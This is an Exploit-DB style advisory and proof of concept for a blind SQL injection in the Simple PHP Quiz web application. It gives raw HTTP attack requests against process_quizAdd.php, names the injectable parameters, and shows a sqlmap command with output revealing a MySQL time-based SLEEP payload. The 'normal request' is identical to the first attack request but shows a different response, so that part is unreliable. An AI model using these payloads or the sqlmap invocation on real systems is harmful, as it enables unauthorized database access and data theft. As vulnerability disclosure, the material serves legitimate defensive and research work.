SimplePHPQuiz - Blind SQL Injection

vendor:

Simple PHP Quiz

by:

HaHwul

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Simple PHP Quiz

Affected Version From: Latest commit

Affected Version To: Latest commit

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian [wheezy]

2016

SimplePHPQuiz – Blind SQL Injection

SimplePHPQuiz is vulnerable to Blind SQL Injection. Attackers can exploit this vulnerability by sending malicious payloads to the vulnerable parameters such as 'correct_answer', 'question', 'wrong_answer1', 'wrong_answer2', and 'wrong_answer3'. By sending a malicious payload, attackers can gain access to the database and extract sensitive information.

Mitigation:

Developers should validate user input and sanitize it before using it in SQL queries. Developers should also use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz
# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]


### Vulnerability
1-1. Nomal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

1-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

2-2 Response
    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

3-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>


### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter


### SQLMAP Result
#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer

...snip...

POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
---
Parameter: correct_answer (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
---
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10